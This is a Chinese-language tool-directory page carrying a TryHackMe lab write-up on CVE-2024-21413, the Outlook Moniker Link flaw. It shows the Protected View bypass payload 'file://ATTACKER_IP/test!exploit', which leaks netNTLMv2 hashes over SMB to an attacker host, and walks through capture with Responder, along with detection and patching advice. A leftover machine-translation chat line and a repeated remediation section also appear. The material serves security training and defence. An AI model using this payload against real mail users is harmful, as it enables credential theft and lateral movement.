Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
THM---CVE-2024-21413-Moniker-Link-Microsoft-Outlook- — 2024年2月13日,Microsoft发布了一个严重的Microsoft Outlook安全漏洞,编号为CVE-2024-21413,被称为Moniker Link漏洞。该漏洞允许攻击者绕过Outlook的Protected View机制。 | Kitploit
工具/GitHubGitHub/eylommaayan/thm---cve-2024-21413-moniker-link-microsoft-outlook-
漏洞分析漏洞利用渗透测试学习与教育电子邮件安全实验室与实践
GitHubeylommaayan/thm---cve-2024-21413-moniker-link-microsoft-outlook-

THM---CVE-2024-21413-Moniker-Link-Microsoft-Outlook-

2024年2月13日,Microsoft发布了一个严重的Microsoft Outlook安全漏洞,编号为CVE-2024-21413,被称为Moniker Link漏洞。该漏洞允许攻击者绕过Outlook的Protected View机制。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
78个月前尚未审核
分享

THM---CVE-2024-21413-Moniker-Link-Microsoft-Outlook-

2024年2月13日,微软发布了一个关于Microsoft Outlook的严重安全漏洞,编号为CVE-2024-21413,被称为Moniker Link漏洞。该漏洞允许攻击者绕过Outlook的受保护视图机制。 image

非常好 👍 以下是完整翻译+渗透测试报告格式,专业且清晰的希伯来语。 如您所要求的——仅翻译和格式。 您将自行添加答案、截图和补充,如需后续帮助,我会协助。


渗透测试报告

CVE-2024-21413 – Moniker Link (Microsoft Outlook)


🧩 管理层摘要(Executive Summary)

2024年2月13日,微软发布了一个关于Microsoft Outlook的严重安全漏洞,编号为 CVE-2024-21413,被称为Moniker Link漏洞。

该漏洞允许攻击者绕过Outlook的受保护视图机制,利用特殊链接(Moniker Link),导致受害者的Outlook客户端向攻击者控制的服务器发送登录凭据(NTLM哈希)——无需运行文件且无有效安全警告。

该漏洞可能导致凭据泄露,甚至理论上可能远程执行代码(RCE)。


📌 漏洞详情

参数值
漏洞编号CVE-2024-21413
公布日期2024年2月13日
发现者Haifei Li – Check Point Research
影响凭据泄露 + 潜在RCE
严重程度严重
攻击复杂度低
CVSS评分9.8
官方链接https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2024-21413

🎯 受影响版本

该漏洞影响以下版本:

  • Microsoft Office LTSC 2021 – 版本19.0.0起
  • Microsoft 365 Apps for Enterprise – 版本16.0.1起
  • Microsoft Office 2019 – 版本16.0.1起
  • Microsoft Office 2016 – 版本16.0.5435.1001之前

🎓 学习目标(Learning Objectives)

  • 理解漏洞的工作原理
  • 熟悉Outlook受保护视图机制
  • 利用漏洞泄露凭据
  • 检测手段(Detection)
  • 防御建议(Mitigation)

(漏洞描述)

image

Microsoft Outlook支持以HTML格式显示邮件,并分析各种类型的链接,例如http://和https://。此外,Outlook还支持一种称为Moniker Links的特殊链接,该类链接允许启动应用程序或访问操作系统中的外部资源。

正常情况下,当邮件包含一个启动外部应用程序或访问系统资源(如file://链接)的链接时,Outlook会激活受保护视图安全机制。该机制会显示安全警告并阻止危险操作,如运行代码、宏或访问外部网络资源。

然而,在Outlook中发现了一个漏洞(CVE-2024-21413),该漏洞允许通过简单操作Moniker Link来绕过受保护视图机制。

我们发现的问题(Findings)

在测试过程中发现,使用普通链接如:

file://ATTACKER_IP/test

会导致Outlook尝试通过SMB协议访问网络资源,但此尝试被受保护视图阻止。

相比之下,当链接包含特殊字符!和额外的文本字符串时,例如:

file://ATTACKER_IP/test!exploit

Outlook不会触发受保护视图,而是执行到远程服务器的连接尝试。

在此次尝试中:

Outlook尝试通过SMB访问资源

自动进行身份验证请求

用户的登录凭据被发送给攻击者

捕获到受害者的Windows netNTLMv2哈希

值得注意的是,远程共享不一定实际存在,因为身份验证尝试无论如何都会发生。

影响(Impact)

该漏洞允许攻击者:

泄露用户凭据(netNTLMv2哈希)

执行离线攻击(破解/传递哈希)

在企业网络中进行横向移动

此外,由于Moniker Links使用Windows的COM(组件对象模型)机制,理论上存在远程代码执行(RCE)的可能性。不过,截至测试时,尚未有公开的PoC实现利用此漏洞的实际RCE。

利用漏洞(Exploitation)

在攻击过程中,向受害者发送一封包含Moniker Link的邮件,该链接类似于之前任务中展示的。 攻击者的目标是创建一封包含Moniker Link的邮件,该链接绕过Outlook的受保护视图机制,以便受害者点击链接后,其Outlook客户端尝试从攻击者机器加载文件。此操作导致受害者的netNTLMv2哈希被发送并被攻击者捕获。

在执行攻击之前,我们将回顾一个演示用的PoC(也可在GitHub上获取)。

作者:CMNatic | https://github.com/cmnatic 版本:1.0 | 2024年2月19日

该代码使用Python语言,发送一封包含恶意Moniker Link的HTML邮件。

PoC描述

该PoC:

接收攻击者邮件地址和受害者邮件地址

需要SMTP认证密码 (在此房间中,[email protected]的密码为:attacker)

包含邮件的HTML内容(html_content),其中嵌入恶意Moniker Link

设置邮件字段:Subject、From、To

通过邮件服务器发送邮件

在真实场景中,需要攻击者控制的SMTP服务器(此房间中服务器已提供)。

监听捕获哈希 – Responder

发送邮件后,需要在攻击者机器上启动Responder监听工具,以捕获SMB请求。

在THM AttackBox中,接口名称为ens5:

responder -I ens5

Responder监听SMB、LLMNR和NBT-NS请求,并允许捕获身份验证凭据。

打开受害者机器

通过分屏窗口打开受害者机器

启动Outlook

选择“我不想登录或创建帐户”

关闭产品密钥输入窗口

受害者的邮箱已预先配置

运行漏洞利用(Exploit)

在AttackBox上:

创建新文件exploit.py

将PoC代码粘贴进去

运行前需进行调整:

更新Moniker Link中的攻击者IP地址(第12行)

将MAILSERVER地址替换为:

10.64.165.67

然后运行:

python3 exploit.py

当提示输入密码时,输入:

attacker

如果操作成功,将收到消息:

Email delivered

结果

在受害者机器上打开邮件并点击链接“Click me”后:

Outlook尝试通过SMB连接攻击者机器

Responder捕获到身份验证尝试

成功捕获用户的netNTLMv2哈希

攻击成功完成。

image

检测(Detection)

YARA

Florian Roth创建了一个YARA规则,旨在检测包含Moniker Link中file:\元素的邮件——这可能表明尝试利用CVE-2024-21413。

YARA规则示例(如房间中所示):

该规则搜索邮件的一般特征(如Subject:和Received:)

此外,还搜索可疑的file://链接模式,指向UNC路径(\)以及常见文件扩展名,包括末尾的!字符(受保护视图绕过的特征)

(代码本身保持原样)

Wireshark

此外,可以在Wireshark的数据包捕获中看到从受害者机器到攻击者机器的SMB请求。

在请求过程中:

执行SMB身份验证尝试

可以识别出netNTLMv2哈希(有时被截断)

缓解措施(Remediation)

微软在2月Patch Tuesday更新中包含了修复此漏洞的安全更新。 可以根据Office版本在微软官方链接中查看相关的KB文章列表。

强烈建议通过以下方式更新Microsoft Office:

Windows Update

Microsoft Update Catalog

此外,在完成所有系统更新之前,这是一个提醒,需要实施基本的信息安全措施,特别是提高用户意识,例如:

不点击随机链接,尤其是来自意外邮件的链接

在点击前预览链接地址

将可疑邮件报告给组织内的安全负责人

由于此漏洞绕过了Outlook的受保护视图机制,无法仅通过Outlook配置更改来阻止此攻击。

同样,完全阻止SMB协议在大多数组织中并不推荐,因为该协议对于访问网络资源和文件共享至关重要。不过,可以根据企业策略和网络结构,在防火墙级别实施阻止或限制。

缓解措施(Remediation)

微软在2月Patch Tuesday更新中包含了针对此漏洞的安全修复。 可以根据Office版本在微软官方链接中查看相关的KB文章列表。 强烈建议通过以下方式更新Microsoft Office:

Windows Update

Microsoft Update Catalog

此外,在完成所有系统更新之前,这是一个提醒,需要实施基本的信息安全措施,特别是提高用户意识,例如:

避免点击随机链接,尤其是来自意外邮件的链接

在点击前检查链接地址(预览)

将可疑邮件报告给组织内的安全负责人

由于此漏洞绕过了Outlook的受保护视图机制,无法仅通过Outlook自身的配置更改来阻止此攻击。

同样,完全阻止SMB协议在大多数组织中并不推荐,因为该协议对于访问文件共享和网络资源至关重要。不过,可以根据安全策略和企业网络结构,在防火墙级别实施限制或阻止。

下载工具